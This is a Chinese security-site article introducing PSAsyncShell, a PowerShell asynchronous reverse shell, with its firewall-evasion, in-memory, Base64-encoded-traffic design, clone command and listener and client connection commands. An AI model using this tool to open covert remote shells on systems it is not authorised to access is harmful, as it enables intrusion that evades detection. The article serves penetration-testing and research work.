freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

PSAsyncShell:一款功能强大的PowerShell异步TCP反向Shell
Alpha_h4ck 2022-09-27 20:41:40 202333
所属地 广西

关于PSAsyncShell

PSAsyncShell是一款功能强大的PowerShell异步TCP反向Shell,该工具基于纯PowerShell开发,适用于安装并配置了PowerShell环境的设备使用。和其他反向Shell工具不同的是,该工具所实现的所有通信和执行流都是异步完成的,并实现了一些针对防火墙绕过和远程连接处理对策。

除此之外,该工具还提供了命令历史记录、屏幕清理、文件上传和下载、信息分块和反向Base64 URL编码流量等功能。

工具要求

PowerShell v4.0或更高版本

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/JoelGMSec/PSAsyncShell.git

工具使用

正如我们在上图中看到的,该工具的使用非常简单,我们只需要让服务器部分监听并使用相应的目标 IP 和端口,然后与目标设备建立连接即可。

命令解释

监听来自客户端新传入的链接:

.\PSAsyncShell.ps1 -s -p listen_port

将客户端链接到一台PSAsyncShell服务器:

.\PSAsyncShell.ps1 -c server_ip server_port

工具使用样例

在下面的例子中,我们开启了一个Windows的反向Shell,并使用Linux设备作为服务器:

一切的操作都是异步完成的,也就是说,每次执行命令时,都会进行以下操作:

1、服务器从提示符读取命令并将其存储在变量中;

2、服务器侦听端口并准备发送;

3、客户端连接,接收命令,双方关闭连接;

4、客户端执行命令并保存变量中的结果;

5、服务器再次侦听端口,接收输出;

6、客户端再次连接并将命令的输出发送到服务器;

7、服务器接收它,解码并通过屏幕显示;

8、双方各自关闭连接;

其中,所有流量都通过 Base64 URL 反向编码,信息的执行和发送总是从内存中完成,并且任何时候都不会在磁盘上写入任何内容。

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址

PSAsyncShell:【GitHub传送门

参考资料

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona/


# powershell # 反向Shell
本文为 Alpha_h4ck 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透实战优质工具
Alpha_h4ck LV.10
好好学习,天天向上
  • 2359 文章数
  • 1023 关注者
Tetragon:一款基于eBPF的运行时环境安全监控工具
2025-01-21
DroneXtract:一款针对无人机的网络安全数字取证工具
2025-01-21
CNAPPgoat:一款针对云环境的安全实践靶场
2025-01-21
文章目录